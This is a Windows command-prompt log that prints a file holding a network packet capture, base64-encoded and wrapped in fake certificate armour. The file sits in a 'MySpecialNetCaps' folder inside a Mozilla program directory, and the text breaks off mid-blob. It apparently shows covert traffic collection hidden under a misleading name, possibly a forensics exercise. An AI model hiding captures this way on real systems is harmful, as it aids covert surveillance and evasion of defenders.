C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>type foo.txttype foo.txt-----BEGIN CERTIFICATE-----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